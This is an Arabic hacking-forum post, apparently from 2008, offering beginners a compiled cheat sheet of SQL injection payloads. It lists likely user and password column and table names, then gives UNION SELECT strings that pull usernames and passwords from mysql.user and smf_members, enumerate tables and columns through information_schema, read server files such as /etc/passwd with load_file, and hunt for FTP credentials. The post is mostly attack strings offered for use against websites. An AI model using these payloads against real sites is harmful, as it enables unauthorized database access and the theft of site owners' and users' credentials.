06-03-2008, 12:32 PM
|
قرصان فعال 
|
|
تاريخ التسجيل: Dec 2007
المشاركات: 49
|
|
مجموعة من اوامر Sql من تجميعي
°˚◦ღ♡♥ஓ بسـم اللــه الرحمــن الرحيــم ஓ♥♡ღ ◦˚° السلام عليكم اخواني الغاليين اعضاء القرصان الغالي حبيت اجمع لكم الكلمات المتحتمله التي تستخدم في حقن قواعد البيانات بثغرت SQL jnjection وان شاء الله تفيدكم في الحقن وتكون مرجع للمبتدئين حتى يحفظون الاستغلال نبدأ على بركة الله اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن
كود PHP:
user & users & username & admin & adminlogim & login & member & membername
user_name
الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن
كود PHP:
password & pass & passwd & pwd
اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس
كود PHP:
user
users
mysql.user
mysql.db
mysql.dbh
smf_members
ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن الان مثلا اسم القاعده في الموقع هذي ( mysql.user ) لو نبغي نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل
كود PHP:
union+select+1,2,user,4,5+from+mysql.user
ونفس الاستغلال السابق لليوزر لو نبغي نستخرج باسورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل
كود PHP:
union+select+1,2,password,4,5+from+mysql.user
مثال اخر على الكلمات السابقه للتوضيع
كود PHP:
union+select+1,2,membername,4,5+from+smf_members
لاستخراج الجداول في قواعد البيانات وقت الحقن
كود PHP:
union+select+1,2,table_name,4,5+from+information_schema.tables
لاستخراج الاعمده في قواعد البيانات وقت الحقن
كود PHP:
union+select+1,2,column_name,4,5+from+information_schema.columns
الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً
كود PHP:
union+select+1,2,username,4,5+from+users+where+userid=1/*
الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه
كود PHP:
load_file("/هنا الاوامر")
مثال على هذا
كود PHP:
union+select+1,load_file("/"),3,4+from+mysql.user
وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر
[PHP] union+select+1,load_file("/etc/passwod"),3,4+from+mysql.user[/PHP
الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن هذا الامر خاص بالبحث في الجداول
كود PHP:
union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_name+like+'%25ftp%25'/*
هذا الامر خاص بالبحث في الاعمده
كود PHP:
union+select+1,2,column_name,4,5+from+information_schema.columns+where+column_name+like+'%25ftp%25'/*
FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ
كود PHP:
'%25ftp%25' <<< في هذا الامر
تقدر تكتب اللي تبيه كتخمين منك انت مثلا ftp تستطيع ان تخمن اللي تبيه مثلا بدال كامة
كود PHP:
'%25user%25' & '%25logim%25'
يعني حاول تخمن اكبر عدد من الكلمات المحتمله وحط في بالك ان كل سيرفر يختلف عن الثاني ممكن في سيرفر تطلع معاك بيانات كثيره وسيرفر غيره مايطلع معاك شي عادي
و جميع الحقوق محفوضة للشبح الدموي
ارجوا دكر المصدر اثناء النقل
|
الرئيسية
.
شركة
استضافة .
مركز
تحميل
.
الإسلام
.
مكتبة
الفيديو
.
المجموعة البريدية
.
خدمات
للمواقع
.
اتصل بنا
العرض العادي
